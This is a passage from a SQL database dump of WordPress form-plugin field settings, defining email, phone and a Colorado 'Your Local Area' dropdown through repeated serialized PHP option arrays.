r_address_2','0'),(9188,288,'user_city','0','user_city','0'),(9189,288,'user_zip','0','user_zip','0'),(9190,288,'user_phone','0','user_phone','0'),(9191,288,'user_info_field_group','1','user_info_field_group','1'),(9192,288,'show_help','0','show_help','0'),(9193,288,'help_text','','help_text',''),(9194,288,'calc_auto_include','0','calc_auto_include','0'),(9195,288,'calc_option','0','calc_option','0'),(9196,288,'placeholder','','placeholder',''),(9197,288,'disable_input','0','disable_input','0'),(9198,288,'input_limit','','input_limit',''),(9199,288,'input_limit_type','char','input_limit_type','char'),(9200,288,'input_limit_msg','','input_limit_msg',''),(9201,288,'user_state','0','user_state','0'),(9202,288,'autocomplete_off','0','autocomplete_off','0'),(9203,288,'num_sort','0','num_sort','0'),(9204,288,'admin_label','','admin_label',''),(9205,288,'user_info_field_group_name','','user_info_field_group_name',''),(9206,288,'user_info_field_group_custom','','user_info_field_group_custom',''),(9207,288,'show_desc','0','show_desc','0'),(9208,288,'desc_pos','none','desc_pos','none'),(9209,288,'desc_text','','desc_text',''),(9210,288,'element_class','','element_class',''),(9211,288,'required','1','required','1'),(9212,288,'key','email_96','key','email_96'),(9213,288,'default','','default',''),(9214,288,'container_class','one-half first','container_class','one-half first'),(9215,288,'custom_name_attribute','email','custom_name_attribute','email'),(9216,288,'personally_identifiable','1','personally_identifiable','1'),(9217,288,'parent_id','6','parent_id','6'),(9218,288,'value','','value',''),(9219,289,'objectType','Field','objectType','Field'),(9220,289,'objectDomain','fields','objectDomain','fields'),(9221,289,'editActive','','editActive',''),(9222,289,'order','5','order','5'),(9223,289,'type','phone','type','phone'),(9224,289,'def_id','15','def_id','15'),(9225,289,'label','Phone','label','Phone'),(9226,289,'label_pos','above','label_pos','above'),(9227,289,'mask','(999) 999-9999','mask','(999) 999-9999'),(9228,289,'datepicker','0','datepicker','0'),(9229,289,'first_name','0','first_name','0'),(9230,289,'last_name','0','last_name','0'),(9231,289,'from_name','0','from_name','0'),(9232,289,'user_address_1','0','user_address_1','0'),(9233,289,'user_address_2','0','user_address_2','0'),(9234,289,'user_city','0','user_city','0'),(9235,289,'user_zip','0','user_zip','0'),(9236,289,'user_email','0','user_email','0'),(9237,289,'user_info_field_group','1','user_info_field_group','1'),(9238,289,'show_help','0','show_help','0'),(9239,289,'help_text','','help_text',''),(9240,289,'calc_auto_include','0','calc_auto_include','0'),(9241,289,'calc_option','0','calc_option','0'),(9242,289,'placeholder','','placeholder',''),(9243,289,'disable_input','0','disable_input','0'),(9244,289,'input_limit','','input_limit',''),(9245,289,'input_limit_type','char','input_limit_type','char'),(9246,289,'input_limit_msg','','input_limit_msg',''),(9247,289,'user_state','0','user_state','0'),(9248,289,'autocomplete_off','0','autocomplete_off','0'),(9249,289,'num_sort','0','num_sort','0'),(9250,289,'admin_label','','admin_label',''),(9251,289,'user_info_field_group_name','','user_info_field_group_name',''),(9252,289,'user_info_field_group_custom','','user_info_field_group_custom',''),(9253,289,'show_desc','0','show_desc','0'),(9254,289,'desc_pos','none','desc_pos','none'),(9255,289,'desc_text','','desc_text',''),(9256,289,'element_class','','element_class',''),(9257,289,'required','1','required','1'),(9258,289,'key','phone_97','key','phone_97'),(9259,289,'default','','default',''),(9260,289,'container_class','one-half','container_class','one-half'),(9261,289,'manual_key','','manual_key',''),(9262,289,'custom_mask','','custom_mask',''),(9263,289,'custom_name_attribute','phone','custom_name_attribute','phone'),(9264,289,'personally_identifiable','1','personally_identifiable','1'),(9265,289,'parent_id','6','parent_id','6'),(9266,289,'field_label','Phone','field_label','Phone'),(9267,289,'field_key','phone_97','field_key','phone_97'),(9268,289,'value','','value',''),(9269,290,'objectType','Field','objectType','Field'),(9270,290,'objectDomain','fields','objectDomain','fields'),(9271,290,'editActive','','editActive',''),(9272,290,'order','6','order','6'),(9273,290,'type','listselect','type','listselect'),(9274,290,'label','Your Local Area','label','Your Local Area'),(9275,290,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(9276,290,'label_pos','above','label_pos','above'),(9277,290,'list_type','dropdown','list_type','dropdown'),(9278,290,'multi_size','5','multi_size','5'),(9279,290,'list_show_value','1','list_show_value','1'),(9280,290,'list','a:0:{}','list','a:0:{}'),(9281,290,'user_info_field_group','','user_info_field_group',''),(9282,290,'calc_auto_include','0','calc_auto_include','0'),(9283,290,'user_state','0','user_state','0'),(9284,290,'num_sort','0','num_sort','0'),(9285,290,'admin_label','','admin_label',''),(9286,290,'show_help','0','show_help','0'),(9287,290,'help_text','','help_text',''),(9288,290,'show_desc','0','show_desc','0'),(9289,290,'desc_pos','none','desc_pos','none'),(9290,290,'desc_text','','desc_text',''),(9291,290,'element_class','','element_class',''),(9292,290,'required','1','required','1'),(9293,290,'options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc 